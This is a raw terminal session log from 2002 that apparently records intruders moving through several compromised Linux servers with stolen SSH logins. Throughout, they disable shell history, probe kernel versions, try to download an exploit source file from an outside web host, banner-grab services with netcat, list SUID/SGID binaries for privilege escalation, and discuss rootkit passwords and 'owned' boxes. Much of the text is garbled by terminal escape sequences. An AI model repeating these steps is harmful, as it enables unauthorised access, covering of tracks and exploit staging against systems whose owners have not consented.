Script started on Mon Jan 14 02:13:30 2002 [root@webserver /root]# ssh -v bob @kas.net.au SSH Version 1.2.27 [i586-unknown-linux], protocol version 1.5. Standard version. Does not use RSAREF. webserver: Reading configuration data /etc/ssh/ssh_config webserver: ssh_connec t: getuid 0 geteuid 0 anon 0 webserver: Connecting to kas.net.au [203.89.192.24 4] port 22. webserver: Allocated local port 1021. webserver: Connection establi shed. webserver: Remote protocol version 1.99, remote software version OpenSSH_ 3.0.2p1 webserver: Waiting for server public key. webserver: Received server pu blic key (1152 bits) and host key (1024 bits). Host key not found from the list of known hosts. Are you sure you want to continue connecting (yes/no)? yes Host 'kas.net.au' added to the list of known hosts. webserver: Initializing ran dom; seed file /root/.ssh/random_seed webserver: IDEA not supported, using 3des instead. webserver: Encryption type: 3des webserver: Sent encrypted session ke y. webserver: Installing crc compensation attack detector. webserver: Received encrypted confirmation. webserver: No agent. webserver: Trying RSA authenticati on with key 'vpopmail@webserver' webserver: Server refused our key. webserver: Doing password authentication. bob@kas.net.au's password: webserver: Requesting pty. webserver: Requesting shell. webserver: Entering int eractive session. Last login: Mon Jan 14 18:32:09 2002 from mystic.uprising.net Linux 2.2.20-ow1-hap-2-lbsd1. bob@kas:~$ sxcreen -x bash: sxcreen: command not found bob@kas:~$ screen -x 7[?47h[r[m[2J[H[?7h[?1;4;6l[4l[?1h=[m(B[1;24r[H[2J[H[2Jbob@kas:~$ bob@kas:~$ this better ? bob@kas:~$ yes. bash: yes.: command not found bob@kas:~$ u here? bob@kas:~$ k bob@kas:~$ ssh -l crash bonq.net bob@kas:~$ bob@kas:~$ on sec.... bob@kas:~$ one s bob@kas:~$ i gotta login again. erm got fucked. brb bob@kas:~$ j this is my box.. u can log in direct if uwa nt he bob@kas:~$ k ready bob@kas:~$ ssh -l crash bonq.net bob@kas:~$ w 6:35pm up 48 days, 2:32, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT bob@kas:~$ er gay /proc bob@kas:~$ ssh -l peter mail.knowltons.net bob@kas:~$ ssh -l webmistress www.cro-magnon.com The authenticity of host 'www.cro-magnon.com (216.122.109.178)' can't be establ i [H[2M[22BDSA key fingerprint is 8b:91:6f:f2:28:f8:cd:1d:2b:9e:91:4b:ec:14:3f:f3 . Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'www.cro-magnon.com,216.122.109.178' (DSA) to the li s webmistress@www.cro-magnon.com's password: Last login: Sun Jan 13 23:14:46 2002 from ns1.kas.net.au [H[7M[18B============== Cro-magnon.com ============== unset HISTFILEcro-magnon.com:[webmistress] % unset HISTFILE cro-magnon.com:[webmistress] % unset HISTFILE cro-magnon.com:[webmistress] % bash HISTFIL[webmistress@cro-magnon webmistress]$ unset HISTFILE [webmistress@cro-magnon webmistress]$ w 11:35pm up 41 days, 4:58, 1 user, load average: 0.20, 0.05, 0.01 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT webmistr pts/0 ns1.kas.net.au 11:35pm 0.00s 1.96s ? - [webmistress@cro-magnon webmistress]$ uname -a Linux cro-magnon.com 2.2.16-3 #1 Mon Jun 19 19:09:50 EDT 2000 sparc unknown [webmistress@cro-magnon webmistress]$ dns bash: dns: command not found [webmistress@cro-magnon webmistress]$ /bin/dns bash: /bin/dns: No such file or directory [webmistress@cro-magnon webmistress]$ locate dns /usr/lib/libnss1_dns.so /usr/lib/libnss_dns.so /usr/lib/sendmail-cf/feature/nodns.m4 /usr/lib/linuxconf/descriptions/eng/dnsconf /usr/lib/linuxconf/descriptions/es/dnsconf /usr/lib/linuxconf/descriptions/fr/dnsconf /usr/lib/linuxconf/descriptions/ko/dnsconf /usr/lib/linuxconf/descriptions/pt/dnsconf /usr/lib/linuxconf/descriptions/se/dnsconf /usr/lib/linuxconf/help.eng/dnsconf /usr/lib/linuxconf/help.eng/dnsconf/conflict-1.html /usr/lib/linuxconf/help.eng/dnsconf/conflict-2.html /usr/lib/linuxconf/help.eng/dnsconf/conflict-3.html /usr/lib/linuxconf/help.eng/dnsconf/conflict-4.html /usr/lib/linuxconf/help.eng/dnsconf/conflict.help /usr/lib/linuxconf/help.eng/dnsconf/conflict.html /usr/lib/linuxconf/help.eng/dnsconf/edit-1.html /usr/lib/linuxconf/help.eng/dnsconf/edit-2.html /usr/lib/linuxconf/help.eng/dnsconf/edit-3.html /usr/lib/linuxconf/help.eng/dnsconf/edit-4.html /usr/lib/linuxconf/help.eng/dnsconf/edit.help /usr/lib/linuxconf/help.eng/dnsconf/edit.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders-1.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders-2.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders-3.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders-4.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders.help /usr/lib/linuxconf/help.eng/dnsconf/forwarders.html /usr/lib/linuxconf/help.eng/dnsconf/intro-1.html /usr/lib/linuxconf/help.eng/dnsconf/intro.help /usr/lib/linuxconf/help.eng/dnsconf/intro.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-1.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-2.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-3.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-4.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-5.html /usr/lib/linuxconf/help.eng/dnsconf/iprange.help /usr/lib/linuxconf/help.eng/dnsconf/iprange.html /usr/lib/linuxconf/help.eng/dnsconf/primary-1.html /usr/lib/linuxconf/help.eng/dnsconf/primary-2.html /usr/lib/linuxconf/help.eng/dnsconf/primary-3.html /usr/lib/linuxconf/help.eng/dnsconf/primary-4.html /usr/lib/linuxconf/help.eng/dnsconf/primary-5.html /usr/lib/linuxconf/help.eng/dnsconf/primary-6.html /usr/lib/linuxconf/help.eng/dnsconf/primary-7.html /usr/lib/linuxconf/help.eng/dnsconf/primary-8.html /usr/lib/linuxconf/help.eng/dnsconf/primary.help /usr/lib/linuxconf/help.eng/dnsconf/primary.html /usr/lib/linuxconf/help.eng/dnsconf/secondary-1.html /usr/lib/linuxconf/help.eng/dnsconf/secondary-2.html /usr/lib/linuxconf/help.eng/dnsconf/secondary-3.html /usr/lib/linuxconf/help.eng/dnsconf/secondary.help /usr/lib/linuxconf/help.eng/dnsconf/secondary.html /usr/lib/linuxconf/help.eng/dnsconf-msg-1.16r10.eng /usr/lib/linuxconf/images/dns.xpm /usr/lib/linuxconf/lib/dhcp2dns.sh /usr/lib/linuxconf/mailconf/rulesets.s96.dns.cf /usr/lib/linuxconf/mailconf/rulesets.s96.fewdns.cf /usr/lib/linuxconf/mailconf/rulesets.s96.nodns.cf /usr/lib/linuxconf/modules/dnsconf.so.1.16.10 /usr/lib/linuxconf/redhat/dnsconf.daemons /usr/man/man1/dnsquery.1 /usr/man/man1/dnsdomainname.1 /usr/bin/dnsquery /usr/include/linuxconf/module_apis/dnsconf_api.h /usr/include/linuxconf/module_apis/dnsconf_apidef.h /usr/local/tmp/apache_1.3.20/htdocs/manual/dns-caveats.html /usr/local/tmp/php-4.0.6/ext/standard/dns.c /usr/local/tmp/php-4.0.6/ext/standard/dns.h /usr/local/tmp/php-4.0.6/ext/standard/dns.o /usr/local/tmp/php-4.0.6/ext/standard/dns.lo /usr/local/include/php/ext/standard/dns.h /usr/src/redhat/BUILD/analog-4.13/docs/dns.html /usr/sparc-glibc20-linux/lib/libnss_dns-2.0.7.so /usr/sparc-glibc20-linux/lib/libnss_dns.so /usr/sparc-glibc20-linux/lib/libnss_dns.so.1 /bin/dnsdomainname /lib/libnss1_dns-2.1.2.so /lib/libnss1_dns.so.1 /lib/libnss_dns-2.1.2.so /lib/libnss_dns.so.2 /lib/libnss_dns.so.1 /sbin/dnsconf [webmistress@cro-magnon webmistress]$ locate dns | more /usr/lib/libnss1_dns.so /usr/lib/libnss_dns.so /usr/lib/sendmail-cf/feature/nodns.m4 /usr/lib/linuxconf/descriptions/eng/dnsconf /usr/lib/linuxconf/descriptions/es/dnsconf /usr/lib/linuxconf/descriptions/fr/dnsconf /usr/lib/linuxconf/descriptions/ko/dnsconf /usr/lib/linuxconf/descriptions/pt/dnsconf /usr/lib/linuxconf/descriptions/se/dnsconf /usr/lib/linuxconf/help.eng/dnsconf /usr/lib/linuxconf/help.eng/dnsconf/conflict-1.html /usr/lib/linuxconf/help.eng/dnsconf/conflict-2.html /usr/lib/linuxconf/help.eng/dnsconf/conflict-3.html /usr/lib/linuxconf/help.eng/dnsconf/conflict-4.html /usr/lib/linuxconf/help.eng/dnsconf/conflict.help /usr/lib/linuxconf/help.eng/dnsconf/conflict.html /usr/lib/linuxconf/help.eng/dnsconf/edit-1.html /usr/lib/linuxconf/help.eng/dnsconf/edit-2.html /usr/lib/linuxconf/help.eng/dnsconf/edit-3.html /usr/lib/linuxconf/help.eng/dnsconf/edit-4.html /usr/lib/linuxconf/help.eng/dnsconf/edit.help /usr/lib/linuxconf/help.eng/dnsconf/edit.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders-1.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders-2.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders-3.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders-4.html /usr/lib/linuxconf/help.eng/dnsconf/forwarders.help /usr/lib/linuxconf/help.eng/dnsconf/forwarders.html /usr/lib/linuxconf/help.eng/dnsconf/intro-1.html /usr/lib/linuxconf/help.eng/dnsconf/intro.help /usr/lib/linuxconf/help.eng/dnsconf/intro.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-1.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-2.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-3.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-4.html /usr/lib/linuxconf/help.eng/dnsconf/iprange-5.html /usr/lib/linuxconf/help.eng/dnsconf/iprange.help --More-- /usr/lib/linuxconf/help.eng/dnsconf/iprange.html /usr/lib/linuxconf/help.eng/dnsconf/primary-1.html /usr/lib/linuxconf/help.eng/dnsconf/primary-2.html /usr/lib/linuxconf/help.eng/dnsconf/primary-3.html /usr/lib/linuxconf/help.eng/dnsconf/primary-4.html /usr/lib/linuxconf/help.eng/dnsconf/primary-5.html /usr/lib/linuxconf/help.eng/dnsconf/primary-6.html /usr/lib/linuxconf/help.eng/dnsconf/primary-7.html /usr/lib/linuxconf/help.eng/dnsconf/primary-8.html /usr/lib/linuxconf/help.eng/dnsconf/primary.help /usr/lib/linuxconf/help.eng/dnsconf/primary.html /usr/lib/linuxconf/help.eng/dnsconf/secondary-1.html /usr/lib/linuxconf/help.eng/dnsconf/secondary-2.html /usr/lib/linuxconf/help.eng/dnsconf/secondary-3.html /usr/lib/linuxconf/help.eng/dnsconf/secondary.help /usr/lib/linuxconf/help.eng/dnsconf/secondary.html /usr/lib/linuxconf/help.eng/dnsconf-msg-1.16r10.eng /usr/lib/linuxconf/images/dns.xpm /usr/lib/linuxconf/lib/dhcp2dns.sh /usr/lib/linuxconf/mailconf/rulesets.s96.dns.cf /usr/lib/linuxconf/mailconf/rulesets.s96.fewdns.cf /usr/lib/linuxconf/mailconf/rulesets.s96.nodns.cf /usr/lib/linuxconf/modules/dnsconf.so.1.16.10 /usr/lib/linuxconf/redhat/dnsconf.daemons /usr/man/man1/dnsquery.1 /usr/man/man1/dnsdomainname.1 /usr/bin/dnsquery /usr/include/linuxconf/module_apis/dnsconf_api.h /usr/include/linuxconf/module_apis/dnsconf_apidef.h /usr/local/tmp/apache_1.3.20/htdocs/manual/dns-caveats.html /usr/local/tmp/php-4.0.6/ext/standard/dns.c /usr/local/tmp/php-4.0.6/ext/standard/dns.h /usr/local/tmp/php-4.0.6/ext/standard/dns.o /usr/local/tmp/php-4.0.6/ext/standard/dns.lo /usr/local/include/php/ext/standard/dns.h /usr/src/redhat/BUILD/analog-4.13/docs/dns.html /usr/sparc-glibc20-linux/lib/libnss_dns-2.0.7.so --More-- [K[webmistress@cro-magnon webmistress]$ hrmm ghey [webmistress@cro-magnon webmistress]$ uname -a Linux cro-magnon.com 2.2.16-3 #1 Mon Jun 19 19:09:50 EDT 2000 sparc unknown [webmistress@cro-magnon webmistress]$ hasnt been owned yet \; [webmistress@cro-magnon webmistress]$ wget www.netspace.net.au/~hellman/2.c bash: wget: command not found [webmistress@cro-magnon webmistress]$ fuck this [webmistress@cro-magnon webmistress]$ i'll get scut to write the sparc linux ex p[H[35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P[45Cloit i left my ine on my box that's o [H[4h [4l/usr/lib/linuxconf/modules/dnsconf. [4h [4l/usr/lib/linuxconf/redhat/dnsconf.d [4h [4l/usr/man/man1/dnsquery.1 [4h [4l/usr/man/man1/dnsdomainname.1 [4h [4l/usr/bin/dnsquery [4h [4l/usr/include/linuxconf/module_apis/ [4h [4l/usr/include/linuxconf/module_apis/ [4h [4l/usr/local/tmp/apache_1.3.20/htdocs [4h [4l/usr/local/tmp/php-4.0.6/ext/standa [4h [4l/usr/local/tmp/php-4.0.6/ext/standa [4h [4l/usr/local/tmp/php-4.0.6/ext/standa [4h [4l/usr/local/tmp/php-4.0.6/ext/standa [4h [4l/usr/local/include/php/ext/standard [4h [4l/usr/src/redhat/BUILD/analog-4.13/d [4h [4l/usr/sparc-glibc20-linux/lib/libnss [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lLinux cro-magnon.com 2.2.16-3 #1 Mo [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lbash: wget: command not found [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lffline. [webmistress@cro-magnon webmistress]$ wha cih root pw did you use for this one? i [H[35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P[45Cloit i left mine on my box that's o [35P [35P[45Cneed to develop one i it! ]$ ]$ i dun got root yet ]$ here ]$ nor do i re ]2; Wuff ---- Wuff!! ]2;screenlo[Kwe can get root , but i need root on a diff linux box first to get the raw soc [H[4h [4l/usr/include/linuxconf/module_apis/ [4h [4l/usr/local/tmp/apache_1.3.20/htdocs [4h [4l/usr/local/tmp/php-4.0.6/ext/standa [4h [4l/usr/local/tmp/php-4.0.6/ext/standa [4h [4l/usr/local/tmp/php-4.0.6/ext/standa [4h [4l/usr/local/tmp/php-4.0.6/ext/standa [4h [4l/usr/local/include/php/ext/standard [4h [4l/usr/src/redhat/BUILD/analog-4.13/d [4h [4l/usr/sparc-glibc20-linux/lib/libnss [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lLinux cro-magnon.com 2.2.16-3 #1 Mo [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lbash: wget: command not found [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lffline. [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4l ket to exploit the IRQc [webmistress@cro-magnon webmistress]$ yueah sec im looking [webmistress@cro-magnon webmistress]$ ssh -l whuichwns one ouwns.underworld.ne t[H[35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P [35P[45Cloit i left mine on my box that's o [35P [35P[45Cneed to develop oneit! [35P [35P [35P [35P[46Clinux box first to get the raw soc [35P [35P [35P[45Cf ]$ ]2; Wuff ---- Wuff!! ]2;screenssh -l uwns thream uwns.underworld.ne t ]$ exit [H[4h [4l/usr/src/redhat/BUILD/analog-4.13/d [4h [4l/usr/sparc-glibc20-linux/lib/libnss [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lLinux cro-magnon.com 2.2.16-3 #1 Mo [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lbash: wget: command not found [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lffline. [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lket to exploit the IRQc [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4l[webmistress@cro-magnon webmistress [4h [4lbash: ssh: command not found [4h [4l[webmistress@cro-magnon webmistress [4h [4lexit [4h [4lcro-magnon.com:[webmistress] % ssh [K[K[K]2; Wuff ---- Wuff!! exit logout Connection to www.cro-magnon.com closed. ]2;screenbob@kas:~$ ssh -l thream uwns.underworld.net The authenticity of host 'uwns.underworld.net (209.48.190.43)' can't be establi s DSA key fingerprint is 71:3f:8b:ec:e7:aa:d5:7d:5c:13:2c:19:4a:86:7b:46. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'uwns.underworld.net,209.48.190.43' (DSA) to the lis t thream@uwns.underworld.net's password: Permission denied, please try again. thream@uwns.underworld.net's password: Permission denied, please try again. thream@uwns.underworld.net's password: bob@kas:~$ bob@kas:~$ ssh -l jack mercury.unixrules.net ssh: mercury.unixrules.net: Name or service not known bob@kas:~$ ssh -l aaron@bashful.happyhacker.com ssh_exchange_identification: Connection closed by remote host bob@kas:~$ sshh alter@corrupt.net The authenticity of host 'corrupt.net (204.91.24.40)' can't be established. RSA key fingerprint is b1:b5:36:58:e3:75:68:5a:98:a9:67:85:65:a3:c4:4b. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'corrupt.net,204.91.24.40' (RSA) to the list of know n alter@corrupt.net's password: Permission denied, please try again. alter@corrupt.net's password: bob@kas:~$ gay bob@kas:~$ which one of our root kit pw's do you try using? bob@kas:~$ maybe i know the right one bob@kas:~$ im just loo gging in then gona use dns ? bob@kas:~$ that sounds great. got nay more to try? bob@kas:~$ like 500 ? bob@kas:~$ ehe bob@kas:~$ hehe sdc > * bob@kas:~$ ssh -l tbyjs bjs james.kalifornia.co ssh: james.kalifornia.co: Name or service not known bob@kas:~$ ssh -l bjs james.kalifornia.com The authenticity of host 'james.kalifornia.com (208.179.59.2)' can't be establi s DSA key fingerprint is f7:81:a7:da:b9:d0:86:8c:7f:61:2b:7b:e3:2a:62:1f. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'james.kalifornia.com,208.179.59.2' (DSA) to the lis t bjs@james.kalifornia.com's password: Permission denied, please try again. bjs@james.kalifornia.com's password: bob@kas:~$ fucking a .. thats scuts box too heh bob@kas:~$ nc -p 4438 james.kalifornia.com 21 220 ProFTPD 1.2.3 Server (Blue Labs FTP server) [james.kalifornia.com] bob@kas:~$ nc -p 4438 james.kalifornia.com 21 3 5 220-james.kalifornia.com ESMTP Sendmail 8.12.1/8.12.1; Sun, 13 Jan 2002 23:38:5 5 220- 220-Spam is prohibited here and any detected spam may be used in prosecution 220-against the spammer. This sendmail setup uses PgSQL (postgres) for most of 220-it's tables, for information on this, see 220-http://blue-labs.org/clue/sendmail.php 220 bob@kas:~$ nc -p 4438 mail.knowltons.net 110 owned notowned lame dead fucked ghey bob@kas:~$ ssh -l marcos@aladdin.danforthcenter.org The authenticity of host 'aladdin.danforthcenter.org (216.88.164.28)' can't be e RSA key fingerprint is 81:da:37:60:28:40:25:b7:8e:50:c3:4c:44:ad:99:de. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'aladdin.danforthcenter.org,216.88.164.28' (RSA) to t marcos@aladdin.danforthcenter.org's password: Last login: Fri Jan 11 23:28:45 2002 from pppa16-resalejonesboro1-3r7068.dialin x yzhang has logged on pts/0 from 10.15.0.42. marcos has logged on pts/1 from ns1. marcos@leaf[~]1: unset HISTFILE marcos@leaf[~]2: w 1:42am up 31 days, 14:58, 2 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT yzhang pts/0 10.15.0.42 Fri 7pm 7:10m 0.07s 0.07s -bash2 marcos pts/1 ns1.kas.net.au 1:42am 0.00s 0.12s 0.01s w marcos@leaf[~]3: uname -a Linux leaf 2.4.7-10smp #1 SMP Thu Sep 6 17:09:31 EDT 2001 i686 unknown marcos@leaf[~]4: dns CORRECT>ns (y|n|e|a)? no dns: Command not found. marcos@leaf[~]5: marcos@leaf[~]5: wtf [Kmarcos@leaf[~]5: /bin/dns /bin/dns: Command not found. marcos@leaf[~]6: /bin/nslookup /bin/nslookup: Command not found. marcos@leaf[~]7: wget wget: Command not found. marcos@leaf[~]8: lynx -source www.netspace.net.au/~hellman/2.c lynx: Command not found. marcos@leaf[~]9: this box is gay too [Kmarcos@leaf[~]9: ssh glen@fran.fifthavenuevideo.com The authenticity of host 'fran.fifthavenuevideo.com (65.116.201.196)' can't be e RSA key fingerprint is bf:53:df:ea:85:aa:73:4c:a9:cd:08:21:2f:05:57:4c. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'fran.fifthavenuevideo.com,65.116.201.196' (RSA) to t glen@fran.fifthavenuevideo.com's password: Permission denied, please try again. glen@fran.fifthavenuevideo.com's password: Last login: Fri Jan 11 23:33:48 2002 from 209.83.176.72 ]2;glen@fran.fifthavenuevideo.com: /home/glen[glen@fran glen]$ unset HISTFILE [glen@fran glen]$ w 2:45am up 9 days, 11:35, 1 user, load average: 0.14, 0.16, 0.11 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT glen pts/0 216.88.164.28 2:45am 0.00s 0.39s 0.08s w [glen@fran glen]$ uname -a Linux fran.fifthavenuevideo.com 2.4.2-2smp #1 SMP Sun Apr 8 19:15:45 EDT 2001 i 5 [glen@fran glen]$ dns bash: dns: command not found [glen@fran glen]$ /bin/dns bash: /bin/dns: No such file or directory [glen@fran glen]$ wget bash: wget: command not found [glen@fran glen]$ lynx --h lynx: Invalid Option: --h USAGE: lynx [options] [file] Options are: - receive options and arguments from stdin -accept_all_cookies accept cookies without prompting if Set-Cookie handling is o -anonymous apply restrictions for anonymous account, see also -restrictions -assume_charset=MIMEname charset for documents that don't specify it -assume_local_charset=MIMEname charset assumed for local files -assume_unrec_charset=MIMEname use this instead of unrecognized charsets -auth=id:pw authentication information for protected documents -base prepend a request URL comment and BASE tag to text/html outputs for -source dumps -blink force high intensity bg colors in color mode -book use the bookmark page as the startfile (off) -buried_news toggles scanning of news articles for buried references (on ) -cache=NUMBER NUMBER of documents cached in memory -case enable case sensitive user searching (off) -cfg=FILENAME specifies a lynx.cfg file other than the default -cmd_log=FILENAME log keystroke commands to the given file -cmd_script=FILENAME read keystroke commands from the given file (see -cmd_log) -child exit on left-arrow in startfile, and disable save to disk -color force color mode on with standard bg colors -connect_timeout=N set the N-second connection timeout (18000) -cookie_file=FILENAME specifies a file to use to read cookies -cookie_save_file=FILENAME specifies a file to use to store cookies -cookies toggles handling of Set-Cookie headers (on) -core toggles forced core dumps on fatal errors (off) -crawl with -traversal, output each page to a file with -dump, format output as with -traversal, but to stdout -debug_partial incremental display stages with MessageSecs delay (off) -display=DISPLAY set the display variable for X exec'ed programs -dont_wrap_pre inhibit wrapping of text in
 when -dump'ing and 
                    -crawl'ing, mark wrapped lines in interactive session (off)
   -dump            dump the first file to stdout and exit
   -editor=EDITOR   enable edit mode with specified editor
   -emacskeys       enable emacs-like key movement (off)
   -enable_scrollback 
                    toggles compatibility with comm programs' scrollback
                    keys (may be incompatible with some curses packages) (off)
   -error_file=FILE write the HTTP status code here
   -force_empty_hrefless_a force HREF-less 'A' elements to be empty (close them
 
   -force_html      forces the first document to be interpreted as HTML (off)
   -force_secure    toggles forcing of the secure flag for SSL cookies (off)
   -forms_options   toggles forms-based vs old-style options menu (on)
   -from            toggle transmission of From headers (on)
   -ftp             disable ftp access (off)
   -get_data        user data for get forms, read from stdin,
                    terminated by '---' on a line
   -head            send a HEAD request (off)
   -help            print this usage message
   -hiddenlinks=[option]
                    hidden links: options are merge, listonly, or ignore
   -historical      toggles use of '>' or '-->' as a terminator for comments (o
f
   -homepage=URL    set homepage separate from start page
   -image_links     toggles inclusion of links for all images (off)
   -index=URL       set the default index file to URL
   -ismap           toggles inclusion of ISMAP links when client-side
                    MAPs are present (off)
   -justify         do justification of text (on)
   -link=NUMBER     starting count for lnk#.dat files produced by -crawl (0)
   -localhost       disable URLs that point to remote hosts (off)
   -mime_header     include mime headers and force source dump
   -minimal         toggles minimal versus valid comment parsing (off)
   -newschunksize=NUMBER
                    number of articles in chunked news listings
   -newsmaxchunk=NUMBER
                    maximum news articles in listings before chunking
   -nobold          disable bold video-attribute
   -nobrowse        disable directory browsing
   -nocc            disable Cc: prompts for self copies of mailings (off)
   -nocolor         turn off color support
   -nofilereferer   disable transmission of Referer headers for file URLs (on)
   -nolist          disable the link list feature in dumps (off)
   -nolog           disable mailing of error messages to document owners (on)
   -nonrestarting_sigwinch make window size change handler non-restarting (off)
   -nopause         disable forced pauses for statusline messages
   -noprint         disable some print functions, like -restrictions=print (off
)
   -noredir         don't follow Location: redirection (off)
   -noreferer       disable transmission of Referer headers (off)
   -noreverse       disable reverse video-attribute
   -nostatus        disable the miscellaneous information messages (off)
   -nounderline     disable underline video-attribute
   -number_fields   force numbering of links as well as form input fields (off)
   -number_links    force numbering of links (off)
   -partial         toggles display partial pages while downloading (on)
   -partial_thres   [=NUMBER]
                    number of lines to render before repainting display
                    with partial-display logic (-1)
   -pauth=id:pw     authentication information for protected proxy server
   -popup           toggles handling of single-choice SELECT options via
                    popup windows or as lists of radio buttons (off)
   -post_data       user data for post forms, read from stdin,
                    terminated by '---' on a line
   -preparsed       show parsed text/html with -source and in source view
                    to visualize how lynx behaves with invalid HTML (off)
   -prettysrc       do syntax highlighting and hyperlink handling in source vie
w
   -print           enable print functions (DEFAULT), opposite of -noprint (on)
   -pseudo_inlines  toggles pseudo-ALTs for inlines with no ALT string (on)
   -raw             toggles default setting of 8-bit character translations
                    or CJK mode for the startup character set (off)
   -realm           restricts access to URLs in the starting realm (off)
   -reload          flushes the cache on a proxy server
                    (only the first document affected) (off)
   -restrictions=[options]
                    use -restrictions to see list
   -resubmit_posts  toggles forced resubmissions (no-cache) of forms with
                    method POST when the documents they returned are sought
                    with the PREV_DOC command or from the History List (off)
   -rlogin          disable rlogins (off)
   -selective       require .www_browsable files to browse directories
   -short_url       enables examination of beginning and end of long URL in sta
t
   -show_cursor     toggles hiding of the cursor in the lower right corner (on)
   -show_rate       toggles display of transfer rate (on)
   -soft_dquotes    toggles emulation of the old Netscape and Mosaic bug which
                    treated '>' as a co-terminator for double-quotes and tags (
o
   -source          dump the source of the first file to stdout and exit
   -stack_dump      disable SIGINT cleanup handler (off)
   -startfile_ok    allow non-http startfile and homepage with -validate (off)
   -stdin           read startfile from standard input (off)
   -tagsoup         use TagSoup rather than SortaSGML parser (off)
   -telnet          disable telnets (off)
   -term=TERM       set terminal type to TERM
   -tlog            toggles use of a Lynx Trace Log for the current session (on
)
   -tna             turn on "Textfields Need Activation" mode (off)
   -trace           turns on Lynx trace mode (off)
   -traversal       traverse all http links derived from startfile
   -underscore      toggles use of _underline_ format in dumps (off)
   -use_mouse       turn on mouse support (off)
   -useragent=Name  set alternate Lynx User-Agent header
   -validate        accept only http URLs (meant for validation)
                    implies more restrictions than -anonymous, but
                    goto is allowed for http and https (off)
   -verbose         toggles [LINK], [IMAGE] and [INLINE] comments 
                    with filenames of these images (on)
   -version         print Lynx version information
   -vikeys          enable vi-like key movement (off)
   -width=NUMBER    screen width for formatting of dumps (default is 80)
   -with_backspaces emit backspaces in output if -dumping or -crawling (like 'm
a
[glen@fran glen]$ lynx -
[glen@fran glen]$ find / \( \( -perm -4000 -o -perm -2000 \) \) > z
find: /home/jparis: Permission denied
find: /home/drussell: Permission denied
find: /home/fran/mail: Permission denied
find: /usr/lib/pgsql/backup: Permission denied
find: /var/lib/slocate: Permission denied
find: /var/lib/pgsql/backups: Permission denied
find: /var/lib/pgsql/data: Permission denied
find: /var/lib/mysql/mysql: Permission denied
find: /var/lib/mysql/test: Permission denied
find: /var/lib/mysql/watsekacomm: Permission denied
find: /var/spool/at: Permission denied
find: /var/spool/cron: Permission denied
find: /proc/1/fd: Permission denied
find: /proc/2/fd: Permission denied
find: /proc/3/fd: Permission denied
find: /proc/4/fd: Permission denied
find: /proc/5/fd: Permission denied
find: /proc/6/fd: Permission denied
find: /proc/7/fd: Permission denied
find: /proc/431/fd: Permission denied
find: /proc/436/fd: Permission denied
find: /proc/557/fd: Permission denied
find: /proc/572/fd: Permission denied
find: /proc/607/fd: Permission denied
find: /proc/641/fd: Permission denied
find: /proc/647/fd: Permission denied
find: /proc/648/fd: Permission denied
find: /proc/657/fd: Permission denied
find: /proc/676/fd: Permission denied
find: /proc/700/fd: Permission denied
find: /proc/738/fd: Permission denied
find: /proc/739/fd: Permission denied
find: /proc/740/fd: Permission denied
find: /proc/741/fd: Permission denied
find: /proc/742/fd: Permission denied
find: /proc/743/fd: Permission denied
find: /proc/3417/fd: Permission denied
find: /proc/4417/fd: Permission denied
find: /proc/12263/fd: Permission denied
find: /proc/12264/fd: Permission denied
find: /proc/12265/fd: Permission denied
find: /proc/12266/fd: Permission denied
find: /proc/12267/fd: Permission denied
find: /proc/12268/fd: Permission denied
find: /proc/12269/fd: Permission denied
find: /proc/12270/fd: Permission denied
find: /proc/17543/fd: Permission denied
